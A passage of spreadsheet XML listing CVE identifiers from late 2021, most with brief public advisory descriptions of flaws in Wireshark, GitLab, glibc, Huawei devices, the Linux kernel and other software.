    <t>NULL pointer exception in the IEEE 802.11 dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39929</t>
  </si>
  <si>
    <t>Uncontrolled Recursion in the Bluetooth DHT dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-3993</t>
  </si>
  <si>
    <t>CVE-2021-39930</t>
  </si>
  <si>
    <t>Missing authorization in GitLab EE versions between 12.4 and 14.3.6, between 14.4.0 and 14.4.4, and between 14.5.0 and 14.5.2 allowed an attacker to access a user's custom project and group templates</t>
  </si>
  <si>
    <t>CVE-2021-39931</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 8.11 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. Under specific condition an unauthorised project member was allowed to delete a protected branches due to a business logic error.</t>
  </si>
  <si>
    <t>CVE-2021-39932</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. Using large payloads, the diff feature could be used to trigger high load time for users reviewing code changes.</t>
  </si>
  <si>
    <t>CVE-2021-39933</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. A regular expression used for handling user input (notes, comments, etc) was susceptible to catastrophic backtracking that could cause a DOS attack.</t>
  </si>
  <si>
    <t>CVE-2021-39934</t>
  </si>
  <si>
    <t>Improper access control allows any project member to retrieve the service desk email address in GitLab CE/EE versions starting 12.10 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2.</t>
  </si>
  <si>
    <t>CVE-2021-39935</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 10.5 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. Unauthorized external users could perform Server Side Requests via the CI Lint API</t>
  </si>
  <si>
    <t>CVE-2021-39936</t>
  </si>
  <si>
    <t>Improper access control in GitLab CE/EE affecting all versions starting from 10.7 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows an attacker in possession of a deploy token to access a project's disabled wiki.</t>
  </si>
  <si>
    <t>CVE-2021-39937</t>
  </si>
  <si>
    <t>A collision in access memoization logic in all versions of GitLab CE/EE before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, leads to potential elevated privileges in groups and projects under rare circumstances</t>
  </si>
  <si>
    <t>CVE-2021-39938</t>
  </si>
  <si>
    <t>A vulnerable regular expression pattern in GitLab CE/EE since version 8.15 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows an attacker to cause uncontrolled resource consumption leading to Denial of Service via specially crafted deploy Slash commands</t>
  </si>
  <si>
    <t>CVE-2021-39939</t>
  </si>
  <si>
    <t>An uncontrolled resource consumption vulnerability in GitLab Runner affecting all versions starting from 13.7 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows an attacker triggering a job with a specially crafted docker image to exhaust resources on runner manager</t>
  </si>
  <si>
    <t>CVE-2021-3994</t>
  </si>
  <si>
    <t>CVE-2021-39940</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.2 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. GitLab Maven Package registry is vulnerable to a regular expression denial of service when a specifically crafted string is sent.</t>
  </si>
  <si>
    <t>CVE-2021-39941</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in GitLab CE/EE versions 12.0 to 14.3.6, 14.4 to 14.4.4, and 14.5 to 14.5.2 allowed non-project members to see the default branch name for projects that restrict access to the repository to project members</t>
  </si>
  <si>
    <t>CVE-2021-39942</t>
  </si>
  <si>
    <t>A denial of service vulnerability in GitLab CE/EE affecting all versions starting from 12.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows low-privileged users to bypass file size limits in the NPM package repository to potentially cause denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-39943</t>
  </si>
  <si>
    <t>An authorization logic error in the External Status Check API in GitLab EE affecting all versions starting from 14.1 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allowed a user to update the status of the check via an API call</t>
  </si>
  <si>
    <t>CVE-2021-39944</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. A permissions validation flaw allowed group members with a developer role to elevate their privilege to a maintainer on projects they import</t>
  </si>
  <si>
    <t>CVE-2021-39945</t>
  </si>
  <si>
    <t>Improper access control in the GitLab CE/EE API affecting all versions starting from 9.4 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows an author of a Merge Request to approve the Merge Request even after having their project access revoked</t>
  </si>
  <si>
    <t>CVE-2021-39946</t>
  </si>
  <si>
    <t>Improper neutralization of user input in GitLab CE/EE versions 14.3 to 14.3.6, 14.4 to 14.4.4, and 14.5 to 14.5.2 allowed an attacker to exploit XSS by abusing the generation of the HTML code related to emojis</t>
  </si>
  <si>
    <t>CVE-2021-39947</t>
  </si>
  <si>
    <t>In specific circumstances, trace file buffers in GitLab Runner versions up to 14.3.4, 14.4 to 14.4.2, and 14.5 to 14.5.2 would re-use the file descriptor 0 for multiple traces and mix the output of several jobs</t>
  </si>
  <si>
    <t>CVE-2021-3995</t>
  </si>
  <si>
    <t>A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.</t>
  </si>
  <si>
    <t>CVE-2021-3996</t>
  </si>
  <si>
    <t>A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.</t>
  </si>
  <si>
    <t>CVE-2021-39966</t>
  </si>
  <si>
    <t>There is an Uninitialized AOD driver structure in Smartphones.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-39967</t>
  </si>
  <si>
    <t>There is a Vulnerability of obtaining broadcast information improperly due to improper broadcast permission settings in Smartphones.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-39968</t>
  </si>
  <si>
    <t>Changlian Blocklist has a Business Logic Errors vulnerability .Successful exploitation of this vulnerability may expand the attack surface of the message class.</t>
  </si>
  <si>
    <t>CVE-2021-39969</t>
  </si>
  <si>
    <t>CVE-2021-3997</t>
  </si>
  <si>
    <t>A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.</t>
  </si>
  <si>
    <t>CVE-2021-39970</t>
  </si>
  <si>
    <t>HwPCAssistant has a Improper Input Validation vulnerability.Successful exploitation of this vulnerability may create any file with the system app permission.</t>
  </si>
  <si>
    <t>CVE-2021-39971</t>
  </si>
  <si>
    <t>Password vault has a External Control of System or Configuration Setting vulnerability.Successful exploitation of this vulnerability could compromise confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-39972</t>
  </si>
  <si>
    <t>MyHuawei-App has a Exposure of Sensitive Information to an Unauthorized Actor vulnerability.Successful exploitation of this vulnerability could compromise confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-39973</t>
  </si>
  <si>
    <t>There is a Null pointer dereference in Smartphones.Successful exploitation of this vulnerability may cause the kernel to break down.</t>
  </si>
  <si>
    <t>CVE-2021-39974</t>
  </si>
  <si>
    <t>There is an Out-of-bounds read in Smartphones.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-39975</t>
  </si>
  <si>
    <t>Hilinksvc has a Data Processing Errors vulnerability.Successful exploitation of this vulnerability may cause denial of service attacks.</t>
  </si>
  <si>
    <t>CVE-2021-39976</t>
  </si>
  <si>
    <t>There is a privilege escalation vulnerability in CloudEngine 5800 V200R020C00SPC600. Due to lack of privilege restrictions, an authenticated local attacker can perform specific operation to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege.</t>
  </si>
  <si>
    <t>CVE-2021-39977</t>
  </si>
  <si>
    <t>The HwNearbyMain module has a NULL Pointer Dereference vulnerability.Successful exploitation of this vulnerability may cause a process to restart.</t>
  </si>
  <si>
    <t>CVE-2021-39978</t>
  </si>
  <si>
    <t>Telephony application has a SQL Injection vulnerability.Successful exploitation of this vulnerability may cause privacy and security issues.</t>
  </si>
  <si>
    <t>CVE-2021-39979</t>
  </si>
  <si>
    <t>HHEE system has a Code Injection vulnerability.Successful exploitation of this vulnerability may affect HHEE system integrity.</t>
  </si>
  <si>
    <t>CVE-2021-3998</t>
  </si>
  <si>
    <t>A flaw was found in glibc. The realpath() function can mistakenly return an unexpected value, potentially leading to information leakage and disclosure of sensitive data.</t>
  </si>
  <si>
    <t>CVE-2021-39980</t>
  </si>
  <si>
    <t>Telephony application has a Exposure of Sensitive Information to an Unauthorized Actor vulnerability.Successful exploitation of this vulnerability could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-39981</t>
  </si>
  <si>
    <t>Chang Lian application has a vulnerability which can be maliciously exploited to hide the calling number.Successful exploitation of this vulnerability allows you to make an anonymous call.</t>
  </si>
  <si>
    <t>CVE-2021-39982</t>
  </si>
  <si>
    <t>Phone Manager application has a Improper Privilege Management vulnerability.Successful exploitation of this vulnerability may read and write arbitrary files by tampering with Phone Manager notifications.</t>
  </si>
  <si>
    <t>CVE-2021-39983</t>
  </si>
  <si>
    <t>The HwNearbyMain module has a Data Processing Errors vulnerability.Successful exploitation of this vulnerability may cause a process to restart.</t>
  </si>
  <si>
    <t>CVE-2021-39984</t>
  </si>
  <si>
    <t>Huawei idap module has a Out-of-bounds Read vulnerability.Successful exploitation of this vulnerability may cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-39985</t>
  </si>
  <si>
    <t>The HwNearbyMain module has a Improper Validation of Array Index vulnerability.Successful exploitation of this vulnerability may cause a process to restart.</t>
  </si>
  <si>
    <t>CVE-2021-39986</t>
  </si>
  <si>
    <t>CVE-2021-39987</t>
  </si>
  <si>
    <t>CVE-2021-39988</t>
  </si>
  <si>
    <t>CVE-2021-39989</t>
  </si>
  <si>
    <t>The HwNearbyMain module has a Exposure of Sensitive Information to an Unauthorized Actor vulnerability.Successful exploitation of this vulnerability may cause a process to restart.</t>
  </si>
  <si>
    <t>CVE-2021-3999</t>
  </si>
  <si>
    <t>A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.</t>
  </si>
  <si>
    <t>CVE-2021-39990</t>
  </si>
  <si>
    <t>The screen lock module has a Stack-based Buffer Overflow vulnerability.Successful exploitation of this vulnerability may affect user experience.</t>
  </si>
  <si>
    <t>CVE-2021-39991</t>
  </si>
  <si>
    <t>CVE-2021-39992</t>
  </si>
  <si>
    <t>There is an improper security permission configuration vulnerability on ACPU.Successful exploitation of this vulnerability may affect service confidentiality, integrity, and availability.</t>
  </si>
  <si>
    <t>CVE-2021-39993</t>
  </si>
  <si>
    <t>There is an Integer overflow vulnerability with ACPU in smartphones. Successful exploitation of this vulnerability may cause out-of-bounds access.</t>
  </si>
  <si>
    <t>CVE-2021-39994</t>
  </si>
  <si>
    <t>There is an arbitrary address access vulnerability with the product line test code.Successful exploitation of this vulnerability may affect service confidentiality, integrity, and availability.</t>
  </si>
  <si>
    <t>CVE-2021-39995</t>
  </si>
  <si>
    <t>Some Huawei products use the OpenHpi software for hardware management. A function that parses data returned by OpenHpi contains an out-of-bounds read vulnerability that could lead to a denial of service. Affected product versions include: eCNS280_TD V100R005C10; eSE620X vESS V100R001C10SPC200, V100R001C20SPC200, V200R001C00SPC300.</t>
  </si>
  <si>
    <t>CVE-2021-39996</t>
  </si>
  <si>
    <t>There is a Heap-based buffer overflow vulnerability with the NFC module in smartphones. Successful exploitation of this vulnerability may cause memory overflow.</t>
  </si>
  <si>
    <t>CVE-2021-39997</t>
  </si>
  <si>
    <t>There is a vulnerability of unstrict input parameter verification in the audio assembly.Successful exploitation of this vulnerability may cause out-of-bounds access.</t>
  </si>
  <si>
    <t>CVE-2021-39998</t>
  </si>
  <si>
    <t>There is Vulnerability of APIs being concurrently called for multiple times in HwConnectivityExService a in smartphones. Successful exploitation of this vulnerability may cause the system to crash and restart.</t>
  </si>
  <si>
    <t>CVE-2021-39999</t>
  </si>
  <si>
    <t>There is a buffer overflow vulnerability in eSE620X vESS V100R001C10SPC200 and V100R001C20SPC200. An attacker can exploit this vulnerability by sending a specific message to the target device due to insufficient validation of packets. Successful exploit could cause a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2021-4000</t>
  </si>
  <si>
    <t>CVE-2021-40000</t>
  </si>
  <si>
    <t>The Bluetooth module has an out-of-bounds write vulnerability. Successful exploitation of this vulnerability may result in malicious command execution at the remote end.</t>
  </si>
  <si>
    <t>CVE-2021-40001</t>
  </si>
  <si>
    <t>The CaasKit module has a path traversal vulnerability. Successful exploitation of this vulnerability may cause the MeeTime application to be unavailable.</t>
  </si>
  <si>
    <t>CVE-2021-40002</t>
  </si>
  <si>
    <t>CVE-2021-40003</t>
  </si>
  <si>
    <t>HwPCAssistant has a path traversal vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40004</t>
  </si>
  <si>
    <t>The cellular module has a vulnerability in permission management. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40005</t>
  </si>
  <si>
    <t>The distributed data service component has a vulnerability in data access control. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40006</t>
  </si>
  <si>
    <t>The fingerprint module has a security risk of brute force cracking. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40007</t>
  </si>
  <si>
    <t>There is an information leak vulnerability in eCNS280_TD V100R005C10SPC650. The vulnerability is caused by improper log output management. An attacker with the ability to access the log file of device may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-40008</t>
  </si>
  <si>
    <t>There is a memory leak vulnerability in CloudEngine 12800 V200R019C00SPC800, CloudEngine 5800 V200R019C00SPC800, CloudEngine 6800 V200R019C00SPC800 and CloudEngine 7800 V200R019C00SPC800. The software does not sufficiently track and release allocated memory while parse a series of crafted binary messages, which could consume remaining memory. Successful exploit could cause memory exhaust.</t>
  </si>
  <si>
    <t>CVE-2021-40009</t>
  </si>
  <si>
    <t>There is an Out-of-bounds write vulnerability in the AOD module in smartphones. Successful exploitation of this vulnerability may affect service integrity.</t>
  </si>
  <si>
    <t>CVE-2021-4001</t>
  </si>
  <si>
    <t>A race condition was found in the Linux kernel's ebpf verifier between bpf_map_update_elem and bpf_map_freeze due to a missing lock in kernel/bpf/syscall.c. In this flaw, a local user with a special privilege (cap_sys_admin or cap_bpf) can modify the frozen mapped address space. This flaw affects kernel versions prior to 5.16 rc2.</t>
  </si>
  <si>
    <t>CVE-2021-40010</t>
  </si>
  <si>
    <t>The bone voice ID TA has a heap overflow vulnerability.Successful exploitation of this vulnerability may result in malicious code execution.</t>
  </si>
  <si>
    <t>CVE-2021-40011</t>
  </si>
  <si>
    <t>There is an uncontrolled resource consumption vulnerability in the display module. Successful exploitation of this vulnerability may affect integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40012</t>
  </si>
  <si>
    <t>Vulnerability of pointers being incorrectly used during data transmission in the video framework. Successful exploitation of this vulnerability may affect confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40013</t>
  </si>
  <si>
    <t>Improper permission control vulnerability in the Bluetooth module.Successful exploitation of this vulnerability will affect integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40014</t>
  </si>
  <si>
    <t>The bone voice ID trusted application (TA) has a heap overflow vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40015</t>
  </si>
  <si>
    <t>There is a race condition vulnerability in the binder driver subsystem in the kernel.Successful exploitation of this vulnerability may affect kernel stability.</t>
  </si>
  <si>
    <t>CVE-2021-40016</t>
  </si>
  <si>
    <t>Improper permission control vulnerability in the Bluetooth module.Successful exploitation of this vulnerability will affect confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40017</t>
  </si>
  <si>
    <t>The HW_KEYMASTER module lacks the validity check of the key format. Successful exploitation of this vulnerability may result in out-of-bounds memory access.</t>
  </si>
  <si>
    <t>CVE-2021-40018</t>
  </si>
  <si>
    <t>The eID module has a null pointer reference vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40019</t>
  </si>
  <si>
    <t>Out-of-bounds heap read vulnerability in the HW_KEYMASTER module. Successful exploitation of this vulnerability may cause out-of-bounds access.</t>
  </si>
  <si>
    <t>CVE-2021-4002</t>
  </si>
  <si>
    <t>A memory leak flaw in the Linux kernel's hugetlbfs memory usage was found in the way the user maps some regions of memory twice using shmget() which are aligned to PUD alignment with the fault of some of the memory pages. A local user could use this flaw to get unauthorized access to some data.</t>
  </si>
  <si>
    <t>CVE-2021-40020</t>
  </si>
  <si>
    <t>There is an Out-of-bounds array read vulnerability in the security storage module in smartphones. Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40021</t>
  </si>
  <si>
    <t>The eID module has an out-of-bounds memory write vulnerability,Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40022</t>
  </si>
  <si>
    <t>The weaver module has a vulnerability in parameter type verification,Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40023</t>
  </si>
  <si>
    <t>Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40024</t>
  </si>
  <si>
    <t>Implementation of the WLAN module interfaces has the information disclosure vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40025</t>
  </si>
  <si>
    <t>The eID module has a vulnerability that causes the memory to be used without being initialized,Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40026</t>
  </si>
  <si>
    <t>There is a Heap-based buffer overflow vulnerability in the AOD module in smartphones. Successful exploitation of this vulnerability may affect service integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40027</t>
  </si>
  <si>
    <t>The bone voice ID TA has a vulnerability in calculating the buffer length,Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40028</t>
  </si>
  <si>
    <t>The eID module has an out-of-bounds memory write vulnerability,Successful exploitation of this vulnerability may affect data integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40029</t>
  </si>
  <si>
    <t>There is a Buffer overflow vulnerability due to a boundary error with the Samba server in the file management module in smartphones. Successful exploitation of this vulnerability may affect function stability.</t>
  </si>
  <si>
    <t>CVE-2021-40030</t>
  </si>
  <si>
    <t>The My HUAWEI app has a defect in the design. Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40031</t>
  </si>
  <si>
    <t>There is a Null pointer dereference vulnerability in the camera module in smartphones. Successful exploitation of this vulnerability may affect service integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40032</t>
  </si>
  <si>
    <t>The bone voice ID TA has a vulnerability in information management,Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40033</t>
  </si>
  <si>
    <t>There is an information exposure vulnerability on several Huawei Products. The vulnerability is due to that the software does not properly protect certain information. Successful exploit could cause information disclosure. Affected product versions include: CloudEngine 12800 V200R005C10SPC800; CloudEngine 5800 V200R005C10SPC800, V200R019C00SPC800; CloudEngine 6800 V200R005C10SPC800, V200R005C20SPC800, V200R019C00SPC800; CloudEngine 7800 V200R005C10SPC800, V200R019C00SPC800.</t>
  </si>
  <si>
    <t>CVE-2021-40034</t>
  </si>
  <si>
    <t>The video framework has the memory overwriting vulnerability caused by addition overflow. Successful exploitation of this vulnerability may affect the availability.</t>
  </si>
  <si>
    <t>CVE-2021-40035</t>
  </si>
  <si>
    <t>CVE-2021-40036</t>
  </si>
  <si>
    <t>The bone voice ID TA has a memory overwrite vulnerability. Successful exploitation of this vulnerability may result in malicious code execution.</t>
  </si>
  <si>
    <t>CVE-2021-40037</t>
  </si>
  <si>
    <t>There is a Vulnerability of accessing resources using an incompatible type (type confusion) in the MPTCP subsystem in smartphones. Successful exploitation of this vulnerability may cause the system to crash and restart.</t>
  </si>
  <si>
    <t>CVE-2021-40038</t>
  </si>
  <si>
    <t>There is a Double free vulnerability in the AOD module in smartphones. Successful exploitation of this vulnerability may affect service integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40039</t>
  </si>
  <si>
    <t>CVE-2021-40040</t>
  </si>
  <si>
    <t>Vulnerability of writing data to an arbitrary address in the HW_KEYMASTER module. Successful exploitation of this vulnerability may affect confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40041</t>
  </si>
  <si>
    <t>There is a Cross-Site Scripting(XSS) vulnerability in HUAWEI WS318n product when processing network settings. Due to insufficient validation of user input, a local authenticated attacker could exploit this vulnerability by injecting special characters. Successful exploit could cause certain information disclosure. Affected product versions include: WS318n-21 10.0.2.2, 10.0.2.5 and 10.0.2.6.</t>
  </si>
  <si>
    <t>CVE-2021-40042</t>
  </si>
  <si>
    <t>There is a release of invalid pointer vulnerability in some Huawei products, successful exploit may cause the process and service abnormal. Affected product versions include: CloudEngine 12800 V200R019C10SPC800, V200R019C10SPC900; CloudEngine 5800 V200R019C10SPC800, V200R020C00SPC600; CloudEngine 6800 versions V200R019C10SPC800, V200R019C10SPC900, V200R020C00SPC600, V300R020C00SPC200; CloudEngine 7800 V200R019C10SPC800.</t>
  </si>
  <si>
    <t>CVE-2021-40043</t>
  </si>
  <si>
    <t>The laser command injection vulnerability exists on AIS-BW80H-00 versions earlier than AIS-BW80H-00 9.0.3.4(H100SP13C00). The devices cannot effectively defend against external malicious interference. Attackers need the device to be visually exploitable and successful triggering of this vulnerability could execute voice commands on the device.</t>
  </si>
  <si>
    <t>CVE-2021-40044</t>
  </si>
  <si>
    <t>There is a permission verification vulnerability in the Bluetooth module.Successful exploitation of this vulnerability may cause unauthorized operations.</t>
  </si>
  <si>
    <t>CVE-2021-40045</t>
  </si>
  <si>
    <t>There is a vulnerability of signature verification mechanism failure in system upgrade through recovery mode.Successful exploitation of this vulnerability may affect service confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40046</t>
  </si>
  <si>
    <t>PCManager versions 11.1.1.95 has a privilege escalation vulnerability. Successful exploit could allow the attacker to access certain resource beyond its privilege.</t>
  </si>
  <si>
    <t>CVE-2021-40047</t>
  </si>
  <si>
    <t>There is a vulnerability of memory not being released after effective lifetime in the Bastet module. Successful exploitation of this vulnerability may affect integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40048</t>
  </si>
  <si>
    <t>There is an incorrect buffer size calculation vulnerability in the video framework. Successful exploitation of this vulnerability will affect availability.</t>
  </si>
  <si>
    <t>CVE-2021-40049</t>
  </si>
  <si>
    <t>There is a permission control vulnerability in the PMS module. Successful exploitation of this vulnerability can lead to sensitive system information being obtained without authorization.</t>
  </si>
  <si>
    <t>CVE-2021-4005</t>
  </si>
  <si>
    <t>CVE-2021-40050</t>
  </si>
  <si>
    <t>There is an out-of-bounds read vulnerability in the IFAA module. Successful exploitation of this vulnerability may cause stack overflow.</t>
  </si>
  <si>
    <t>CVE-2021-40051</t>
  </si>
  <si>
    <t>There is an unauthorized access vulnerability in system components. Successful exploitation of this vulnerability will affect confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40052</t>
  </si>
  <si>
    <t>There is an incorrect buffer size calculation vulnerability in the video framework.Successful exploitation of this vulnerability may affect availability.</t>
  </si>
  <si>
    <t>CVE-2021-40053</t>
  </si>
  <si>
    <t>There is a permission control vulnerability in the Nearby module.Successful exploitation of this vulnerability will affect availability and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40054</t>
  </si>
  <si>
    <t>There is an integer underflow vulnerability in the atcmdserver module. Successful exploitation of this vulnerability may affect integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40055</t>
  </si>
  <si>
    <t>There is a man-in-the-middle attack vulnerability during system update download in recovery mode. Successful exploitation of this vulnerability may affect integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40056</t>
  </si>
  <si>
    <t>There is a vulnerability of copying input buffer without checking its size in the video framework. Successful exploitation of this vulnerability may affect availability.</t>
  </si>
  <si>
    <t>CVE-2021-40057</t>
  </si>
  <si>
    <t>There is a heap-based and stack-based buffer overflow vulnerability in the video framework. Successful exploitation of this vulnerability may affect availability.</t>
  </si>
  <si>
    <t>CVE-2021-40058</t>
  </si>
  <si>
    <t>There is a heap-based buffer overflow vulnerability in the video framework. Successful exploitation of this vulnerability may affect availability.</t>
  </si>
  <si>
    <t>CVE-2021-40059</t>
  </si>
  <si>
    <t>There is a permission control vulnerability in the Wi-Fi module. Successful exploitation of this vulnerability may affect confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40060</t>
  </si>
  <si>
    <t>CVE-2021-40061</t>
  </si>
  <si>
    <t>There is a vulnerability of accessing resources using an incompatible type (type confusion) in the Bastet module. Successful exploitation of this vulnerability may affect integrity.</t>
  </si>
  <si>
    <t>CVE-2021-40062</t>
  </si>
  <si>
    <t>CVE-2021-40063</t>
  </si>
  <si>
    <t>There is an improper access control vulnerability in the video module. Successful exploitation of this vulnerability may affect confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40064</t>
  </si>
  <si>
    <t>There is a heap-based buffer overflow vulnerability in system components. Successful exploitation of this vulnerability may affect system stability.</t>
  </si>
  <si>
    <t>CVE-2021-40065</t>
  </si>
  <si>
    <t>The communication module has a service logic error vulnerability.Successful exploitation of this vulnerability may affect data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-40066</t>
  </si>
  <si>
    <t>The access controls on the Mobility read-only API improperly validate user access permissions. Attackers with both network access to the API and valid credentials can read data from it; regardless of access control group membership settings. This vulnerability is fixed in Mobility v11.76 and Mobility v12.14.</t>
  </si>
  <si>
    <t>CVE-2021-40067</t>
  </si>
  <si>
    <t>The access controls on the Mobility read-write API improperly validate user access permissions; this API is disabled by default. If the API is manually enabled, attackers with both network access to the API and valid credentials can read and write data to it; regardless of access control group membership settings. This vulnerability is fixed in Mobility v12.14.</t>
  </si>
  <si>
    <t>CVE-2021-4007</t>
  </si>
  <si>
    <t>Rapid7 Insight Agent, versions 3.0.1 to 3.1.2.34, suffer from a local privilege escalation due to an uncontrolled DLL search path. Specifically, when Insight Agent versions 3.0.1 to 3.1.2.34 start, the Python interpreter attempts to load python3.dll at "C:\DLLs\python3.dll," which normally is writable by locally authenticated users. Because of this, a malicious local user could use Insight Agent's startup conditions to elevate to SYSTEM privileges. This issue was fixed in Rapid7 Insight Agent 3.1.2.35. This vulnerability is a regression of CVE-2019-5629.</t>
  </si>
  <si>
    <t>CVE-2021-4008</t>
  </si>
  <si>
    <t>A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SProcRenderCompositeGlyphs function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-40083</t>
  </si>
  <si>
    <t>Knot Resolver before 5.3.2 is prone to an assertion failure, triggerable by a remote attacker in an edge case (NSEC3 with too many iterations used for a positive wildcard proof).</t>
  </si>
  <si>
    <t>CVE-2021-40084</t>
  </si>
  <si>
    <t>opensysusers through 0.6 does not safely use eval on files in sysusers.d that may contain shell metacharacters. For example, it allows command execution via a crafted GECOS field whereas systemd-sysusers (a program with the same specification) does not do that.</t>
  </si>
  <si>
    <t>CVE-2021-40085</t>
  </si>
  <si>
    <t>An issue was discovered in OpenStack Neutron before 16.4.1, 17.x before 17.2.1, and 18.x before 18.1.1. Authenticated attackers can reconfigure dnsmasq via a crafted extra_dhcp_opts value.</t>
  </si>
  <si>
    <t>CVE-2021-40086</t>
  </si>
  <si>
    <t>An issue was discovered in PrimeKey EJBCA before 7.6.0. As part of the configuration of the aliases for SCEP, CMP, EST, and Auto-enrollment, the enrollment secret was reflected on a page (that can only be viewed by an administrator). While hidden from direct view, checking the page source would reveal the secret.</t>
  </si>
  <si>
    <t>CVE-2021-40087</t>
  </si>
  <si>
    <t>An issue was discovered in PrimeKey EJBCA before 7.6.0. When audit logging changes to the alias configurations of various protocols that use an enrollment secret, any modifications to the secret were logged in cleartext in the audit log (that can only be viewed by an administrator). This affects use of any of the following protocols: SCEP, CMP, or EST.</t>
  </si>
  <si>
    <t>CVE-2021-40088</t>
  </si>
